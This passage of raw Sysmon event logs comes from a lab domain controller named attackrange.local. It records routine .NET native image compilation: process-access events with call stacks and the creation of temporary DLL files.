4)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008608Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:28.762{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4684-6000-7204-000000009A01}4920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008607Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:28.684{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4684-6000-7204-000000009A01}4920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008606Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:28.684{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4684-6000-7204-000000009A01}4920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008605Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:28.621{08A6967A-4684-6000-7104-000000009A01}4148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1034-0\System.Dynamic.dll2021-01-14 13:26:28.621 10341000x80000000000000008604Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:28.418{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4684-6000-7104-000000009A01}4148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008603Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:28.324{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4684-6000-7104-000000009A01}4148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008602Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:28.324{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4684-6000-7104-000000009A01}4148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008601Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:28.262{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4684-6000-7004-000000009A01}2736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008600Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:28.246{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4684-6000-7004-000000009A01}2736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008599Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:28.246{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4684-6000-7004-000000009A01}2736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008598Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:28.184{08A6967A-4684-6000-6F04-000000009A01}4152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1038-0\System.Drawing.Design.dll2021-01-14 13:26:28.184 10341000x80000000000000008597Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:28.043{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4684-6000-6F04-000000009A01}4152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008596Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:28.028{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4684-6000-6F04-000000009A01}4152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008595Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:28.028{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4684-6000-6F04-000000009A01}4152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008619Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:29.731{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4685-6000-7504-000000009A01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008618Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:29.715{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4685-6000-7504-000000009A01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008617Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:29.715{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4685-6000-7504-000000009A01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008616Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:29.606{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4685-6000-7404-000000009A01}3920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008615Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:29.590{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4685-6000-7404-000000009A01}3920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008614Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:29.590{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4685-6000-7404-000000009A01}3920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008613Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:29.465{08A6967A-4685-6000-7304-000000009A01}1036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\40c-0\System.EnterpriseServices.dll2021-01-14 13:26:29.465 11241100x80000000000000008612Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:29.450{08A6967A-4685-6000-7304-000000009A01}1036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\40c-0\System.EnterpriseServices.Wrapper.dll2021-01-14 13:26:29.450 10341000x80000000000000008611Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:29.043{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4685-6000-7304-000000009A01}1036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008610Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:29.028{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4685-6000-7304-000000009A01}1036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008609Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:29.028{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4685-6000-7304-000000009A01}1036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008633Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:31.965{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4687-6000-7904-000000009A01}4216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DL